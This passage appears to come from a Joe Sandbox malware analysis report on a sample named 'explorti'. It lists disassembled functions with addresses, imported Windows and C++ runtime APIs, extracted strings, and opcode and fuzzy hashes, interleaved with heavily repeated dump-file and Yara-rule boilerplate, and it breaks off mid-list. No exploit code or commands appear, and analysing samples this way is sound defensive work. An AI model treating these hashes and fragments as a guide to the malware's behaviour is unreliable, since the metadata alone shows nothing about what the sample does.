Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5fa416f945be08fbdd8474e73bd5f1febba96ddb65eba3aec15424e755028799
Instruction ID: dc2c7a3a9949fcd0014bc89d634d18f5ffdff66bc97ac610ddc29c06c58470b2
Opcode Fuzzy Hash: 5fa416f945be08fbdd8474e73bd5f1febba96ddb65eba3aec15424e755028799
Instruction Fuzzy Hash: 90C22971E2462D8BDB25DE28DD407EAF3B9EB48384F1441EAD94DE7240E774AE918F40

Function 002F2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 6084d1705f2f2afc09b5893a608830756f05eb1214a4a8bc0b54b0d9a0ac1864
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 94F15D71E1021ADBDF14CFA8C8806AEF7B1FF49354F25826AD919AB344D730AE15CB90

Function 002CD312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 002B247E

Strings

'k,d+1, xrefs: 002CDCEC
'k,d+1, xrefs: 002CD324, 002CDCA4

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'k,d+1$'k,d+1
API String ID: 2659868963-3369981402
Opcode ID: 89fce1ea59fe18c1db8b59d3c89f81203d3542b21f74a3292cd744fc338be645
Instruction ID: b44de3aec6609fced87af0b83803e5b46e2bf45ea52a28f179908bdf541fea51
Opcode Fuzzy Hash: 89fce1ea59fe18c1db8b59d3c89f81203d3542b21f74a3292cd744fc338be645
Instruction Fuzzy Hash: AB5189B2E20606CBDB16CF59D881BAAB7F9FF48310F24866AD405EB254D7709960CF50

Function 002CCB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,002CCE82,?,?,?,?,002CCEB7,?,?,?,?,?,?,002CC42D,?,00000001), ref: 002CCB33

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 73b847be66c31987102be817ad0cbef5802cceb64476644516744ca15d1c24c7
Instruction ID: 0b708c28fdf6a105809dcc4ec2d30120a3a327904e600306ee8d824ec5dd2999
Opcode Fuzzy Hash: 73b847be66c31987102be817ad0cbef5802cceb64476644516744ca15d1c24c7
Instruction Fuzzy Hash: 99D0223262303893CA022BE0EC08EECBB0C8A04B14B18031AE80C23120CE515C109BE0

Function 002E7D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 002E7EFF

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 52a80abeeb14b1af58f5d260799b931eaf14e241b2e5fb0283ea146b3a341b79
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 9051A8302FC6CA56DB388E3B88953BE679A9F43300FD80559D482C7A82DB519D349352

Function 002B4CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2696f9cf99d7da95f535fa43a37144db77be026736458c9b25a16ca5a088edf
Instruction ID: 4230764e4b4185060c40108e43144b370fba3b958701b3c57bf79fe2c59bfb5e
Opcode Fuzzy Hash: d2696f9cf99d7da95f535fa43a37144db77be026736458c9b25a16ca5a088edf
Instruction Fuzzy Hash: 39224EB3F515144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648

Function 002F6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca291f766e86663f4d212e61213a2d7eca87e0d58cf87b0fc67b642d3d60386
Instruction ID: 1838ed083d417172c7017d889169dbe71f01c310bcf9e430d729052e962c42d9
Opcode Fuzzy Hash: eca291f766e86663f4d212e61213a2d7eca87e0d58cf87b0fc67b642d3d60386
Instruction Fuzzy Hash: 8EB16C31224609DFD714CF28C486B65BBA0FF453A4F25866CE99ACF2A1C735E9A1CB40

Function 002B4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a349c5fbc47b87b0e99fb8b0d315556cf52d14fd69ce0e8dce2057477d1a1d9
Instruction ID: 6a4681e274a3718aa603782e0447604141236cb2794329108026039c3f2f16c3
Opcode Fuzzy Hash: 2a349c5fbc47b87b0e99fb8b0d315556cf52d14fd69ce0e8dce2057477d1a1d9
Instruction Fuzzy Hash: 5C51B2706097928FC319CF2D902563ABFE1BFD5300F084A9EE0E687292DB74D558CB91

Function 002F777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69236aca418db36fa01f707a980880002a552e952bc09fdf9a656d075a39171
Instruction ID: 6bb191a3cd7d875b58ca9a4ded832cfedfeecaf146d8ea8f313fbb0d8aa3131f
Opcode Fuzzy Hash: b69236aca418db36fa01f707a980880002a552e952bc09fdf9a656d075a39171
Instruction Fuzzy Hash: 6D21B673F204394B770CC57E8C572BDB6E1C68C641745823AE8A6EA2C1D968D917E2E4

Function 002F765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6efc6488ce40042c1194a6ef289ad2982a858311c4c9cfa6597641f468eef5
Instruction ID: cfa2993f61527981b807243ff254386e7b7a56ee8f291b8892543f8ab3ad5f8d
Opcode Fuzzy Hash: dd6efc6488ce40042c1194a6ef289ad2982a858311c4c9cfa6597641f468eef5
Instruction Fuzzy Hash: 2C118A23F30C295B675C817D8C172BAA5D6DBDC25071F533AD826E7384E994DE23D290

Function 002F8720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 4f4c8a1a114bdc4c80f52a237bda1326f6f0e38566447ce6b73f7ae1977b448a
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: C111387F22014B43D604AE2DC8F4BBBE796EAC53A1B3C437AC3414B758DA229964D900

Function 002E645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3b9aa0c928804c9bf765e0e863ec0947604f9d01837c09a1bf07611c49f22a
Instruction ID: 1a1233c132c8d7d66cad5ab8c5ba0a1bf93a0624388667434219c66f8e073769
Opcode Fuzzy Hash: 0a3b9aa0c928804c9bf765e0e863ec0947604f9d01837c09a1bf07611c49f22a
Instruction Fuzzy Hash: 6BE086311915886ACE367F16CC0DA8C3B59EB513C1F808414F8084A161CB76EDA2C980

Function 002EA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: d5eb46ba91d1184ebeb8a36cbb1aba8cea0ec013de4ed668b68b9cd168eebcce
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: BCE08C32965268EBCB15DBC9C904D8AF3ECEB48B10F958096F505D7240C2B0EF00CBD0

Function 002B2E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 002B2F1F
GetCurrentThreadId.KERNEL32 ref: 002B2F3E
__Mtx_unlock.LIBCPMT ref: 002B2F8C
__Cnd_broadcast.LIBCPMT ref: 002B2FA3
__Mtx_unlock.LIBCPMT ref: 002B30B5
GetCurrentThreadId.KERNEL32 ref: 002B30F2
__Mtx_unlock.LIBCPMT ref: 002B315B

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 702015ae0d4fc412975a5a5784e1104345786dddd322586c1e28d397a878a1e5
Instruction ID: 98bf51f0b7fab5272a1055f52d44d14fdd680e5e12288b54d03142397016b8f1
Opcode Fuzzy Hash: 702015ae0d4fc412975a5a5784e1104345786dddd322586c1e28d397a878a1e5
Instruction Fuzzy Hash: E9A1D1709203069FDB11EF64C945BAAB7F8FF15390F14862DE819D7641EB30EA28CB91

Function 002C7870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 002C795C
__Cnd_destroy_in_situ.LIBCPMT ref: 002C7968
__Mtx_destroy_in_situ.LIBCPMT ref: 002C7971

Strings

d+1, xrefs: 002C7904, 002C7912, 002C790A
@y,, xrefs: 002C794A
'k,d+1, xrefs: 002C7879, 002C790B

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
